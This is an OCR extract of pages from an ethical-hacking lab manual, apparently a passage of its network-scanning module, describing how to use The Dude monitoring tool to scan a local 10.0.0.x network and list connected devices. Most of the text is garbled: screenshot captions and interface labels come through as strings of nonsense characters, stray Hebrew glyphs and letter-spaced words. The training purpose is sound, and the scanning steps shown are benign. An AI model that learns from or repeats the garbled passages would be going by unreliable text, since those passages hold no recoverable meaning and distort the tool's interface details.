Q Ktolciy Actons V/V2H9STOSG M-rle Local
‫ם‬ Lrk» WttOUMRSHL WCte Local
WHCSCI• SG1 w‫•*־־‬ Local
‫ ־‬1‫ס‬ 1‫יה״‬
C7 Aden WIUJO0MI tncb Local
CfOebuo w!H«5sr.c1u u-de Local
r7Ev«4 vmo Local
LfS ^ o fl
CJ Mbr*d».
W K M W S8
w*C0w»
M‫* |״‬
*mcl*
Local
Local

Cflrr ‫׳‬x2 91 kbpa/ tx276bf>t S f l n 0 ‫־‬9‫־׳‬t 2 l6 -‫׳‬rp * ■* ‫ ל‬2‫ ׳ל‬4 ‫?» ן‬

F IG U R E 1 8 .1 1 : S c a n n e d n e t w o r k c o m p le t e i n f o r m a t io n

C E H Lab M anual Page 263 E th ic a l H ackin g and Counterm easures Copyright C by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

11. A s described previously, you m ay select all die o th e r o p tio n s fro m the
d ro p -d o w n lis t to v ie w d ie respective in fo rm a tio n .

12. O nce scanning is com plete, c lic k the b u tto n to disconnect.

a d m in © lo c a lh o s t - Th e D u d e 4.0beta3

Fwfcwnooa 9 Local Sorvor *•to

•‫ל‬ jCtnas d G' ”

+ ‫״‬ r C. O k S*crgc Onoowf ‫ ״‬Too* M \ •*.‫״‬ L* ,* [irk T
R AddressU8I8
£ AdnlrM
□ Agert« t< ,1 ‫י‬
□ Chate
□ Gevces W ik U L Y S S B K H Q IP W IN-D39NRSH1.91=4 ADMIN
r* =1« tpu 2 2 % IM fT t S 0 % v.it 3 4 % disk 7 5 %

n F_racn8
Q HistoryActions
H Linlcs
=3 Leg* ‫י‬ v ‫י‬
C‫־‬fActon _ WIN-2N95T0SGIEM \ 1000
(ZJ Dcbuo
Even!
O S/*log
□ Mto Nodoo
Q ISetwoifcMips
r B - l gcjj
<| 1■ j [>

‫ ־‬r ‫ ־ \־ ^־־‬T
^ ‫־ ר ^ ל ^ ה־ רז‬
.1
WM-LXQ\3\VR3!WM

nZ W k b w ' b 135 bps 5<?vrr r t i. 1 2 c p 5 't * 3 •15 *bps

FIGURE 18.12:Connectionof systemsin network

L a b A n a ly s is
Analyze and docum ent die results related to die lab exercise.

T o o l/U tility In fo r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d

IP A d d re s s R a n g e : 10.0.0.0 — 10.0.0.24

D e v ic e N a m e P re fe re n ce s: D N S , S N M P ,
The D ude N E T B IO S , IP

O u tp u t: L is t o f connected system, devices in

N e tw o rk

C E H Lab M anual Page 264 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

RELATED TO THIS LAB.

In te r n e t C o n n e c tio n R e q u ire d

□ Y es 0 No

P la tfo r m S u p p o rte d

0 C la s s ro o m 0 iLabs

C E H Lab M anual Page 265 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.